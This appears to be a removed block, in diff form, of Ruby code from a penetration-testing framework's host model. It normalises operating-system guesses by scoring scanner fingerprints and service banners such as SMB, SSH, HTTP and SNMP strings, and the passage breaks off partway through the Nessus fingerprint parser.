- # - def normalize_os - host = self - - wname = {} # os_name == Linux, Windows, Mac OS X, VxWorks - wtype = {} # purpose == server, client, device - wflav = {} # os_flavor == Ubuntu, Debian, 2003, 10.5, JetDirect - wvers = {} # os_sp == 9.10, SP2, 10.5.3, 3.05 - warch = {} # arch == x86, PPC, SPARC, MIPS, '' - wlang = {} # os_lang == English, '' - whost = {} # hostname - - # Note that we're already restricting the query to this host by using - # host.notes instead of Note, so don't need a host_id in the - # conditions. - fingerprintable_notes = self.notes.where("ntype like '%%fingerprint'") - fingerprintable_notes.each do |fp| - next if not validate_fingerprint_data(fp) - norm = normalize_scanner_fp(fp) - wvers[norm[:os_sp]] = wvers[norm[:os_sp]].to_i + (100 * norm[:certainty]) - wname[norm[:os_name]] = wname[norm[:os_name]].to_i + (100 * norm[:certainty]) - wflav[norm[:os_flavor]] = wflav[norm[:os_flavor]].to_i + (100 * norm[:certainty]) - warch[norm[:arch]] = warch[norm[:arch]].to_i + (100 * norm[:certainty]) - whost[norm[:name]] = whost[norm[:name]].to_i + (100 * norm[:certainty]) - wtype[norm[:type]] = wtype[norm[:type]].to_i + (100 * norm[:certainty]) - end - - # Grab service information and assign scores. Some services are - # more trustworthy than others. If more services agree than not, - # than that should be considered as well. - # Each service has a starting number of points. Services that - # are more difficult to fake are awarded more points. The points - # represent a running total, not a fixed score. - # XXX: This needs to be refactored in a big way. Tie-breaking is - # pretty arbitrary, it would be nice to explicitly believe some - # services over others, but that means recording which service - # has an opinion and which doesn't. It would also be nice to - # identify "impossible" combinations of services and alert that - # something funny is going on. 
- # XXX: This hack solves the memory leak generated by self.services.each {} - fingerprintable_services = self.services.where("name is not null and name != '' and info is not null and info != ''") - fingerprintable_services.each do |s| - points = 0 - case s.name - when 'smb' - points = 210 - case s.info - when /\.el([23456])(\s+|$)/ # Match Samba 3.0.33-0.30.el4 as RHEL4 - wname['Linux'] = wname['Linux'].to_i + points - wflav["RHEL" + $1] = wflav["RHEL" + $1].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /(ubuntu|debian|fedora|red ?hat|rhel)/i - wname['Linux'] = wname['Linux'].to_i + points - wflav[$1.capitalize] = wflav[$1.capitalize].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /^Windows/ - win_sp = nil - win_flav = nil - win_lang = nil - - ninfo = s.info - ninfo.gsub!('(R)', '') - ninfo.gsub!('(TM)', '') - ninfo.gsub!(/\s+/, ' ') - ninfo.gsub!('No Service Pack', 'Service Pack 0') - - # Windows (R) Web Server 2008 6001 Service Pack 1 (language: Unknown) (name:PG-WIN2008WEB) (domain:WORKGROUP) - # Windows XP Service Pack 3 (language: English) (name:EGYPT-B3E55BF3C) (domain:EGYPT-B3E55BF3C) - # Windows 7 Ultimate (Build 7600) (language: Unknown) (name:WIN7) (domain:WORKGROUP) - # Windows 2003 No Service Pack (language: Unknown) (name:VMWIN2003) (domain:PWNME) - - #if ninfo =~ /^Windows ([^\s]+)(.*)(Service Pack |\(Build )([^\(]+)\(/ - if ninfo =~ /^Windows (.*)(Service Pack [^\s]+|\(Build [^\)]+\))/ - win_flav = $1.strip - win_sp = ($2).strip - win_sp.gsub!(/with.*/, '') - win_sp.gsub!('Service Pack', 'SP') - win_sp.gsub!('Build', 'b') - win_sp.gsub!(/\s+/, '') - win_sp.tr!("()", '') - else - if ninfo =~ /^Windows ([^\s+]+)([^\(]+)\(/ - win_flav = $2.strip - end - end - - - if ninfo =~ /name: ([^\)]+)\)/ - hostname = $1.strip - end - - if ninfo =~ /language: ([^\)]+)\)/ - win_lang = $1.strip - end - - win_lang = nil if win_lang =~ /unknown/i - win_vers = win_sp - - wname['Microsoft Windows'] = wname['Microsoft 
Windows'].to_i + points - wlang[win_lang] = wlang[win_lang].to_i + points if win_lang - wflav[win_flav] = wflav[win_flav].to_i + points if win_flav - wvers[win_vers] = wvers[win_vers].to_i + points if win_vers - whost[hostname] = whost[hostname].to_i + points if hostname - - case win_flav - when /NT|2003|2008/ - win_type = 'server' - else - win_type = 'client' - end - wtype[win_type] = wtype[win_type].to_i + points - end - - when 'ssh' - points = 104 - case s.info - when /honeypot/i # Never trust this - nil - when /ubuntu/i - # This needs to be above /debian/ becuase the ubuntu banner contains both, e.g.: - # SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6 - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /debian/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Debian'] = wflav['Debian'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /FreeBSD/ - wname['FreeBSD'] = wname['FreeBSD'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /sun_ssh/i - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /vshell|remotelyanywhere|freessh/i - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /radware/i - wname['RadWare'] = wname['RadWare'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /dropbear/i - wname['Linux'] = wname['Linux'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /netscreen/i - wname['NetScreen'] = wname['NetScreen'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /vpn3/ - wname['Cisco VPN 3000'] = wname['Cisco VPN 3000'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /cisco/i - wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points - wtype['device'] = wtype['device'].to_i + 
points - - when /mpSSH/ - wname['HP iLO'] = wname['HP iLO'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end - when 'http' - points = 99 - case s.info - when /iSeries/ - wname['IBM iSeries'] = wname['IBM iSeries'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Mandrake/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Mandrake'] = wflav['Mandrake'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Mandriva/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Mandrake'] = wflav['Mandrake'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Ubuntu/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Debian/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Debian'] = wflav['Debian'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Fedora/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Fedora'] = wflav['Fedora'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /CentOS/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['CentOS'] = wflav['CentOS'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /RHEL/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['RHEL'] = wflav['RHEL'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Red.?Hat/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Red Hat'] = wflav['Red Hat'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /SuSE/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['SUSE'] = wflav['SUSE'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /TurboLinux/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['TurboLinux'] = wflav['TurboLinux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when 
/Gentoo/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Gentoo'] = wflav['Gentoo'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Conectiva/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Conectiva'] = wflav['Conectiva'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Asianux/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Asianux'] = wflav['Asianux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Trustix/i - wname['Linux'] = wname['Linux'].to_i + points - wflav['Trustix'] = wflav['Trustix'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /White Box/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['White Box'] = wflav['White Box'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /UnitedLinux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['UnitedLinux'] = wflav['UnitedLinux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /PLD\/Linux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['PLD/Linux'] = wflav['PLD/Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Vine\/Linux/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['Vine/Linux'] = wflav['Vine/Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /rPath/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['rPath'] = wflav['rPath'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /StartCom/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['StartCom'] = wflav['StartCom'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /linux/i - wname['Linux'] = wname['Linux'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /PalmOS/ - wname['PalmOS'] = wname['PalmOS'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/[234]\.0/ - 
wname['Microsoft Windows NT 4.0'] = wname['Microsoft Windows NT 4.0'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/5\.0/ - wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/5\.1/ - wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/6\.0/ - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Microsoft[\x20\x2d]IIS\/7\.0/ - wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Win32/i - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /DD\-WRT ([^\s]+) /i - wname['Linux'] = wname['Linux'].to_i + points - wflav['DD-WRT'] = wflav['DD-WRT'].to_i + points - wvers[$1.strip] = wvers[$1.strip].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /Darwin/ - wname['Apple Mac OS X'] = wname['Apple Mac OS X'].to_i + points - - when /FreeBSD/i - wname['FreeBSD'] = wname['FreeBSD'].to_i + points - - when /OpenBSD/i - wname['OpenBSD'] = wname['OpenBSD'].to_i + points - - when /NetBSD/i - wname['NetBSD'] = wname['NetBSD'].to_i + points - - when /NetWare/i - wname['Novell NetWare'] = wname['Novell NetWare'].to_i + points - - when /OpenVMS/i - wname['OpenVMS'] = wname['OpenVMS'].to_i + points - - when /SunOS|Solaris/i - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - - when /HP.?UX/i - wname['HP-UX'] = wname['HP-UX'].to_i + points - end - when 'snmp' - points = 103 - case s.info - when /^Sun SNMP Agent/ - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^SunOS 
([^\s]+) ([^\s]+) / - # XXX 1/2 XXX what does this comment mean i wonder - wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Linux ([^\s]+) ([^\s]+) / - whost[$1] = whost[$1].to_i + points - wname['Linux ' + $2] = wname['Linux ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - arch = get_arch_from_string(s.info) - warch[arch] = warch[arch].to_i + points if arch - wtype['server'] = wtype['server'].to_i + points - - when /^Novell NetWare ([^\s]+)/ - wname['Novell NetWare ' + $1] = wname['Novell NetWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - arch = "x86" - warch[arch] = warch[arch].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Novell UnixWare ([^\s]+)/ - wname['Novell UnixWare ' + $1] = wname['Novell UnixWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - arch = "x86" - warch[arch] = warch[arch].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^HP-UX ([^\s]+) ([^\s]+) / - # XXX - wname['HP-UX ' + $2] = wname['HP-UX ' + $2].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^IBM PowerPC.*Base Operating System Runtime AIX version: (\d+\.\d+)/ - wname['IBM AIX ' + $1] = wname['IBM AIX ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^SCO TCP\/IP Runtime Release ([^\s]+)/ - wname['SCO UnixWare ' + $1] = wname['SCO UnixWare ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /.* IRIX version ([^\s]+)/ - wname['SGI IRIX ' + $1] = wname['SGI IRIX ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Unisys ([^\s]+) version ([^\s]+) kernel/ - wname['Unisys ' + $2] = wname['Unisys ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - 
whost[$1] = whost[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /.*OpenVMS V([^\s]+) / - # XXX - wname['OpenVMS ' + $1] = wname['OpenVMS ' + $1].to_i + points - wvers[$1] = wvers[$1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows NT Version ([^\s]+) / - wname['Microsoft Windows NT ' + $1] = wname['Microsoft Windows NT ' + $1].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows 2000 Version 5\.0/ - wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows 2000 Version 5\.1/ - wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - when /^Hardware:.*Software: Windows Version 5\.2/ - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - - # XXX: TODO 2008, Vista, Windows 7 - - when /^Microsoft Windows CE Version ([^\s]+)+/ - wname['Microsoft Windows CE ' + $1] = wname['Microsoft Windows CE ' + $1].to_i + points - wtype['client'] = wtype['client'].to_i + points - - when /^IPSO ([^\s]+) ([^\s]+) / - whost[$1] = whost[$1].to_i + points - wname['Nokia IPSO ' + $2] = wname['Nokia IPSO ' + $2].to_i + points - wvers[$2] = wvers[$2].to_i + points - arch = get_arch_from_string(s.info) - warch[arch] = warch[arch].to_s + points if arch - wtype['device'] = wtype['device'].to_i + points - - when /^Sun StorEdge/ - wname['Sun StorEdge'] = wname['Sun StorEdge'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /^HP StorageWorks/ - wname['HP StorageWorks'] = wname['HP StorageWorks'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /^Network Storage/ - # XXX - wname['Network Storage Router'] = wname['Network Storage Router'].to_i + points - 
wtype['device'] = wtype['device'].to_i + points - - when /Cisco Internetwork Operating System.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco IOS ' + vers] = wname['Cisco IOS ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Cisco Catalyst.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco CatOS ' + vers] = wname['Cisco CatOS ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Cisco 761.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco 761 ' + vers] = wname['Cisco 761 ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Network Analysis Module.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco NAM ' + vers] = wname['Cisco NAM ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /VPN 3000 Concentrator Series Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco VPN 3000 ' + vers] = wname['Cisco VPN 3000 ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ProCurve.*Switch/ - wname['3Com ProCurve Switch'] = wname['3Com ProCurve Switch'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ProCurve.*Access Point/ - wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /3Com.*Access Point/i - wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ShoreGear/ - wname['ShoreTel Appliance'] = wname['ShoreTel Appliance'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /firewall/i - wname['Unknown Firewall'] = wname['Unknown Firewall'].to_i + points - 
wtype['device'] = wtype['device'].to_i + points - - when /phone/i - wname['Unknown Phone'] = wname['Unknown Phone'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /router/i - wname['Unknown Router'] = wname['Unknown Router'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /switch/i - wname['Unknown Switch'] = wname['Unknown Switch'].to_i + points - wtype['device'] = wtype['device'].to_i + points - # - # Printer Signatures - # - when /^HP ETHERNET MULTI-ENVIRONMENT/ - wname['HP Printer'] = wname['HP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Canon/i - wname['Canon Printer'] = wname['Canon Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Epson/i - wname['Epson Printer'] = wname['Epson Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /ExtendNet/i - wname['ExtendNet Printer'] = wname['ExtendNet Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Fiery/i - wname['Fiery Printer'] = wname['Fiery Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Konica/i - wname['Konica Printer'] = wname['Konica Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lanier/i - wname['Lanier Printer'] = wname['Lanier Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lantronix/i - wname['Lantronix Printer'] = wname['Lantronix Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lexmark/i - wname['Lexmark Printer'] = wname['Lexmark Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Magicolor/i - wname['Magicolor Printer'] = wname['Magicolor Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Minolta/i - wname['Minolta Printer'] = wname['Minolta Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + 
points - when /NetJET/i - wname['NetJET Printer'] = wname['NetJET Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /OKILAN/i - wname['OKILAN Printer'] = wname['OKILAN Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Phaser/i - wname['Phaser Printer'] = wname['Phaser Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /PocketPro/i - wname['PocketPro Printer'] = wname['PocketPro Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Ricoh/i - wname['Ricoh Printer'] = wname['Ricoh Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Savin/i - wname['Savin Printer'] = wname['Savin Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /SHARP AR/i - wname['SHARP Printer'] = wname['SHARP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Star Micronix/i - wname['Star Micronix Printer'] = wname['Star Micronix Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Source Tech/i - wname['Source Tech Printer'] = wname['Source Tech Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Xerox/i - wname['Xerox Printer'] = wname['Xerox Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Brother/i - wname['Brother Printer'] = wname['Brother Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Axis.*Network Print/i - wname['Axis Printer'] = wname['Axis Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Prestige/i - wname['Prestige Printer'] = wname['Prestige Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^ZebraNet/i - wname['ZebraNet Printer'] = wname['ZebraNet Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /e\-STUDIO/i - wname['eStudio 
Printer'] = wname['eStudio Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Gestetner/i - wname['Gestetner Printer'] = wname['Gestetner Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /IBM.*Print/i - wname['IBM Printer'] = wname['IBM Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /HP (Color|LaserJet|InkJet)/i - wname['HP Printer'] = wname['HP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Dell (Color|Laser|Ink)/i - wname['Dell Printer'] = wname['Dell Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Print/i - wname['Unknown Printer'] = wname['Unknown Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - end # End of s.info for SNMP - - when 'telnet' - points = 105 - case s.info - when /IRIX/ - wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points - when /AIX/ - wname['IBM AIX'] = wname['IBM AIX'].to_i + points - when /(FreeBSD|OpenBSD|NetBSD)\/(.*) / - wname[$1] = wname[$1].to_i + points - arch = get_arch_from_string($2) - warch[arch] = warch[arch].to_i + points - when /Ubuntu (\d+(\.\d+)+)/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wvers[$1] = wvers[$1].to_i + points - when /User Access Verification/ - wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points - when /Microsoft/ - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - end # End of s.info for TELNET - wtype['server'] = wtype['server'].to_i + points - - when 'smtp' - points = 103 - case s.info - when /ESMTP.*SGI\.8/ - wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for SMTP - - when 'https' - points = 101 - case s.info - when /(VMware\s(ESXi?)).*\s([\d\.]+)/ - # Very reliable fingerprinting from our own esx_fingerprint module - wname[$1] = wname[$1].to_i + 
(points * 5) - wflav[$3] = wflav[$3].to_i + (points * 5) - wtype['device'] = wtype['device'].to_i + points - end # End of s.info for HTTPS - - when 'netbios' - points = 201 - case s.info - when /W2K3/i - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /W2K8/i - wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for NETBIOS - - when 'dns' - points = 101 - case s.info - when 'Microsoft DNS' - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for DNS - end # End of s.name case - # End of Services - end - - # - # Report the best match here - # - best_match = {} - best_match[:os_name] = wname.keys.sort{|a,b| wname[b] <=> wname[a]}[0] - best_match[:purpose] = wtype.keys.sort{|a,b| wtype[b] <=> wtype[a]}[0] - best_match[:os_flavor] = wflav.keys.sort{|a,b| wflav[b] <=> wflav[a]}[0] - best_match[:os_sp] = wvers.keys.sort{|a,b| wvers[b] <=> wvers[a]}[0] - best_match[:arch] = warch.keys.sort{|a,b| warch[b] <=> warch[a]}[0] - best_match[:name] = whost.keys.sort{|a,b| whost[b] <=> whost[a]}[0] - best_match[:os_lang] = wlang.keys.sort{|a,b| wlang[b] <=> wlang[a]}[0] - - best_match[:os_flavor] ||= host[:os_flavor] || "" - if best_match[:os_name] - # Handle cases where the flavor contains the base name - # Don't use gsub!() here because the string was a hash key in a - # previously life and gets frozen on 1.9.1, see #4128 - best_match[:os_flavor] = best_match[:os_flavor].gsub(best_match[:os_name], '') - end - - # If we didn't get anything, use whatever the host already has. 
- # Failing that, fallback to "Unknown" - best_match[:os_name] ||= host[:os_name] || 'Unknown' - best_match[:purpose] ||= 'device' - - [:os_name, :purpose, :os_flavor, :os_sp, :arch, :name, :os_lang].each do |host_attr| - next if host.attribute_locked? host_attr - if best_match[host_attr] - host[host_attr] = Rex::Text.ascii_safe_hex(best_match[host_attr]) - end - end - - host.save if host.changed? - end - - protected - - # - # Convert a host.os.*_fingerprint Note into a hash containing the standard os_* fields - # - # Also includes a :certainty which is a float from 0 - 1.00 indicating the - # scanner's confidence in its fingerprint. If the particular scanner does - # not provide such information, defaults to 0.80. - # - # TODO: This whole normalize scanner procedure needs to be shoved off to its own - # mixin. It's far too long and convoluted, has a ton of repeated code, and is - # a massive hassle to update with new fingerprints. - def normalize_scanner_fp(fp) - return {} if not validate_fingerprint_data(fp) - ret = {} - data = fp.data - case fp.ntype - when 'host.os.session_fingerprint' - # These come from meterpreter sessions' client.sys.config.sysinfo - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ - ret[:os_name] = "Linux" - ret[:name] = $1 - ret[:os_sp] = $2 - ret[:arch] = get_arch_from_string($3) - else - ret[:os_name] = data[:os] - end - ret[:arch] = data[:arch] if data[:arch] - ret[:name] = data[:name] if data[:name] - - when 'host.os.nmap_fingerprint', 'host.os.mbsa_fingerprint' - # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"2000" :os_accuracy=>"94" - # - # :os_match=>"Microsoft Windows Vista SP0 or SP1, Server 2008, or Windows 7 Ultimate (build 7000)" - # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"7" :os_accuracy=>"100" - ret[:certainty] = data[:os_accuracy].to_f / 100.0 - if (data[:os_vendor] == data[:os_family]) - ret[:os_name] 
= data[:os_family] - else - ret[:os_name] = data[:os_vendor] + " " + data[:os_family] - end - ret[:os_flavor] = data[:os_version] - ret[:name] = data[:hostname] if data[:hostname] - - when 'host.os.nexpose_fingerprint' - # :family=>"Windows" :certainty=>"0.85" :vendor=>"Microsoft" :product=>"Windows 7 Ultimate Edition" - # :family=>"Linux" :certainty=>"0.64" :vendor=>"Linux" :product=>"Linux" - # :family=>"Linux" :certainty=>"0.80" :vendor=>"Ubuntu" :product=>"Linux" - # :family=>"IOS" :certainty=>"0.80" :vendor=>"Cisco" :product=>"IOS" - # :family=>"embedded" :certainty=>"0.61" :vendor=>"Linksys" :product=>"embedded" - ret[:certainty] = data[:certainty].to_f - case data[:family] - when /AIX|ESX|Mac OS X|OpenSolaris|Solaris|IOS|Linux/ - if data[:vendor] == data[:family] - ret[:os_name] = data[:vendor] - else - # family often contains the vendor string, so rip it out to - # avoid useless duplication - ret[:os_name] = data[:vendor].to_s + " " + data[:family].to_s.gsub(data[:vendor].to_s, '').strip - end - when "Windows" - ret[:os_name] = "Microsoft Windows" - if data[:product] - if data[:product][/2008/] && data[:version].to_i == 7 - ret[:os_flavor] = "Windows 7" - ret[:type] = "client" - else - ret[:os_flavor] = data[:product].gsub("Windows", '').strip - ret[:os_sp] = data[:version] if data[:version] - if data[:product] - ret[:type] = "server" if data[:product][/Server/] - ret[:type] = "client" if data[:product][/^(XP|ME)$/] - end - end - end - when "embedded" - ret[:os_name] = data[:vendor] - else - ret[:os_name] = data[:vendor] - end - ret[:arch] = get_arch_from_string(data[:arch]) if data[:arch] - ret[:arch] ||= get_arch_from_string(data[:desc]) if data[:desc] - - when 'host.os.retina_fingerprint' - # :os=>"Windows Server 2003 (X64), Service Pack 2" - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - else - # No idea what this looks like if it isn't windows. Just store - # the whole thing and hope for the best. XXX: Ghetto. 
=/ - ret[:os_name] = data[:os] - end - when 'host.os.nessus_fingerprint' - # :os=>"Microsoft Windows 2000 Advanced Server (English)" - # :os=>"Microsoft Windows 2000\nMicrosoft Windows XP" - # :os=>"Linux Kernel 2.6" - # :os=>"Sun Solaris 8" - # :os=>"IRIX 6.5" - - # Nessus sometimes jams multiple OS names together with a newline. - oses = data[:os].split(/\n/) - if oses.length > 1 - # Multiple fingerprints means Nessus wasn't really sure, reduce - # the certainty accordingly - ret[:certainty] = 0.5 - else - ret[:certainty] = 0.8 - end - - # Since there is no confidence associated with them, the best we - # can do is just take the first one. - case oses.first - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - - when /(2\.[46]\.\d+[-a-zA-Z0-9]+)/ - # Linux kernel version - ret[:os_name] = "Linux" - ret[:os_sp] = $1 - when /(.*)?((\d+\.)+\d+)$/ - # Then we don't necessarily know what the os is, but this - # fingerprint has some version information at the end, pull it - # off. - # When Nessus doesn't know what kind of linux it has, it gives an os like - # "Linux Kernel 2.6" - # The "Kernel" string is useless, so cut it off. - ret[:os_name] = $1.gsub("Kernel", '').strip - 